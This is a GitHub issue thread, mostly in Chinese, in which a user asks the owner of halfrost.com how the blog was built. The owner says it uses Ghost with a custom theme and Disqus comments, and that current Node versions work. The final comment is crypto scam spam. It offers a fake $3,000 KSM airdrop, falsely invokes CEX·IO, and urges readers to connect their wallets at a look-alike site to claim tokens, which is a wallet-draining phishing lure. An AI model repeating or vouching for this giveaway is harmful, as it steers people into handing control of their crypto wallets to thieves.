### ISSUE TITLE
请问你的博客 halfrost.com 是通过这个项目搭建的吗？还有用到什么开源项目吗

### ISSUE THREAD

**Issue by Kevin-free** [halfrost/Halfrost-Field#41]

**Comment by marlonxlj** [comment]
您好！
     收到您的来信！

**Comment by halfrost** [comment]
@Kevin-free 我的博客是用 ghost 博客搭建的。主题用的是这个[主题](https://github.com/halfrost/Prometheus)

**Comment by Kevin-free** [comment]
@halfrost 好的，谢谢~ 我去了解一下

**Comment by Kevin-free** [comment]
@halfrost 霜神你好，我在你的blog怎么没看到评论区了，有个问题那就在这请教一下：

**Comment by Kevin-free** [comment]
@halfrost 霜神你好，我在你的blog怎么没看到评论区了，有个问题那在这向你请教一下：
我在执行 node `./configure`时报错 `No acceptable C compiler found!`, 但是我已经安装了 `gcc`。我在网上查说是 Python 版本问题。请问是 Node v0.10.40 这个版本有什么特殊要求吗？或者可以不用博客教程中所用的版本搭建吗？

**Comment by marlonxlj** [comment]
您好！
     收到您的来信！

**Comment by halfrost** [comment]
> @halfrost 霜神你好，我在你的blog怎么没看到评论区了，有个问题那在这向你请教一下： 我在执行 node `./configure`时报错 `No acceptable C compiler found!`, 但是我已经安装了 `gcc`。我在网上查说是 Python 版本问题。请问是 Node v0.10.40 这个版本有什么特殊要求吗？或者可以不用博客教程中所用的版本搭建吗？

@Kevin-free 您好，我的评论用的是 Disqus，这个在国内被墙掉了，你翻墙以后应该可以看到评论区。Node 你可以使用最新版，不需要参考博客中的版本了。

**Comment by Kevin-free** [comment]
> > @halfrost 霜神你好，我在你的blog怎么没看到评论区了，有个问题那在这向你请教一下： 我在执行 node `./configure`时报错 `No acceptable C compiler found!`, 但是我已经安装了 `gcc`。我在网上查说是 Python 版本问题。请问是 Node v0.10.40 这个版本有什么特殊要求吗？或者可以不用博客教程中所用的版本搭建吗？
> 
> @Kevin-free 您好，我的评论用的是 Disqus，这个在国内被墙掉了，你翻墙以后应该可以看到评论区。Node 你可以使用最新版，不需要参考博客中的版本了。

好的，谢谢！ 那我按照官方的教程来吧（哦对了，我一直在墙外哦，刚刚看了下显示评论区了）

**Comment by halfrost** [comment]
> > > @halfrost 霜神你好，我在你的blog怎么没看到评论区了，有个问题那在这向你请教一下： 我在执行 node `./configure`时报错 `No acceptable C compiler found!`, 但是我已经安装了 `gcc`。我在网上查说是 Python 版本问题。请问是 Node v0.10.40 这个版本有什么特殊要求吗？或者可以不用博客教程中所用的版本搭建吗？
> > 
> > 
> > @Kevin-free 您好，我的评论用的是 Disqus，这个在国内被墙掉了，你翻墙以后应该可以看到评论区。Node 你可以使用最新版，不需要参考博客中的版本了。
> 
> 好的，谢谢！ 那我按照官方的教程来吧（哦对了，我一直在墙外哦，刚刚看了下显示评论区了）

@Kevin-free 嗯，可以按照官方的来，ghost 已经进化了好几个大版本了。变化还挺大的了

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
